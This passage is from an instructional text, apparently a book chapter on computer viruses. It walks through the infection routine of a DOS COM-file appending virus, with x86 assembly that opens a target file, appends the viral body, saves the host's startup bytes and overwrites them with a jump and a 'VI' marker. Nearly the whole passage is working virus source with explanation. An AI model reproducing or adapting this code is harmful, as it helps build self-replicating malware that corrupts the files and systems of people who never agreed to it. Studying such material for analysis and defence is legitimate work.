After the virus finds a file to infect, it must carry out the infection process. We have already briefly discussed how that is to be accomplished, but now let’s write the code that will actually do it. We’ll put all of this code into a routine called INFECT.
The code for INFECT is quite straightforward. First the virus opens the file whose name is stored at FNAME in read/write mode, just as it did when searching for a file, and it stores the file handle in a data area called HANDLE. This time, however we want to go to the end of the file and store the virus there. To do so, we first move the file pointer using DOS function 42H. In calling function 42H, the register bx must be set up with the file handle number, and cx:dx must contain a 32 bit long integer telling where to move the file pointer to. There are three different ways this function can be used, as specified by the contents of the al register.
If al=0, the file pointer is set relative to the beginning of the file. If al=1, it is incremented relative to the current location, and if al=2,
cx:dx is used as the offset from the end of the file. Since the first thing the virus must do is place its code at the end of the COM file it is attacking, it sets the file pointer to the end of the file. This is easy. Set cx:dx=0, al=2 and call function 42H:
xor cx,cx mov dx,cx
mov bx,WORD PTR [HANDLE]
mov ax,4202H int 21H
With the file pointer in the right location, the virus can now write itself out to disk at the end of this file. To do so, one simply uses the DOS write function, 40 Hex. To use function 40H one must set ds:dx to the location in memory where the data is stored that is going to be written to disk. In this case that is the start of the virus.
Next, set cx to the number of bytes to write and bx to the file handle.
There is one problem here. Since the virus is going to be attaching itself to COM files of all different sizes, the address of the start of the virus code is not at some fixed location in memory.
Every file it is attached to will put it somewhere else in memory.
So the virus has to be smart enough to figure out where it is. To do this we will employ a trick in the main control routine, and store the offset of the viral code in a memory location named VIR_START. Here we assume that this memory location has al-ready been properly initialized. Then the code to write the virus to the end of the file it is attacking will simply look like this:
mov cx,OFFSET FINAL - OFFSET VIRUS mov bx,WORD PTR [HANDLE]
mov dx,WORD PTR [VIR_START]
mov ah,40H int 21H
where VIRUS is a label identifying the start of the viral code and FINAL is a label identifying the end of the code. OFFSET FINAL - OFFSET VIRUS is independent of the location of the virus in memory.
Now, with the main body of viral code appended to the end of the COM file under attack, the virus must do some clean-up work. First, it must move the first five bytes of the COM file to a storage area in the viral code. Then it must put a jump instruction plus the code letters ’VI’ at the start of the COM file. Since we have already read the first five bytes of the COM file in the search routine, they are sitting ready and waiting for action at START_IM-AGE. We need only write them out to disk in the proper location.
Note that there must be two separate areas in the virus to store five bytes of startup code. The active virus must have the data area START_IMAGE to store data from files it wants to infect, but it must also have another area, which we’ll call START_CODE. This contains the first five bytes of the file it is actually attached to.
Without START_CODE, the active virus will not be able to transfer control to the host program it is attached to when it is done executing.
To write the first five bytes of the file under attack, the virus must take the five bytes at START_IMAGE, and store them where START_CODE is located on disk. First, the virus sets the file pointer to the location of START_CODE on disk. To find that location, one must take the original file size (stored at FSIZE by
Figure 8: START_IMAGE and START_CODE.
Host 2
START_CODE
Virus On Disk
Host 1 Virus
START_CODE START_IMAGE
In Memory
the search routine), and add OFFSET START_CODE - OFFSET VIRUS to it, moving the file pointer with respect to the beginning of the file:
xor cx,cx
mov dx,WORD PTR [FSIZE]
add dx,OFFSET START_CODE - OFFSET VIRUS mov bx,WORD PTR [HANDLE]
mov ax,4200H int 21H
Next, the virus writes the five bytes at START_IMAGE out to the file:
mov cx,5
mov bx,WORD PTR [HANDLE]
mov dx,OFFSET START_IMAGE mov ah,40H
int 21H
The final step in infecting a file is to set up the first five bytes of the file with a jump to the beginning of the virus code, along with the identification letters “VI”. To do this, first position the file pointer to the beginning of the file:
xor cx,cx mov dx,cx
mov bx,WORD PTR [HANDLE]
mov ax,4200H int 21H
Next, we must set up a data area in memory with the correct information to write to the beginning of the file. START_IMAGE is a good place to set up these bytes since the data there is no longer needed for anything. The first byte should be a near jump instruc-tion, E9 Hex:
mov BYTE PTR [START_IMAGE],0E9H
The next two bytes should be a word to tell the CPU how many bytes to jump forward. This byte needs to be the original file size of the host program, plus the number of bytes in the virus which are before the start of the executable code (we will put some data
there). We must also subtract 3 from this number because the relative jump is always referenced to the current instruction pointer, which will be pointing to 103H when the jump is actually executed.
Thus, the two bytes telling the program where to jump are set up by
mov ax,WORD PTR [FSIZE]
add ax,OFFSET VIRUS_START - OFFSET VIRUS -3 mov WORD PTR [START_IMAGE+1],ax
Finally set up the ID bytes ’VI’ in our five byte data area,
mov WORD PTR [START_IMAGE+3],4956H ;’VI’
write the data to the start of the file, using the DOS write function,
mov cx,5
mov dx,OFFSET START_IMAGE mov bx,WORD PTR [HANDLE]
mov ah,40H int 21H
and then close the file using DOS,
mov ah,3EH
mov bx,WORD PTR [HANDLE]
int 21H
This completes the copy mechanism.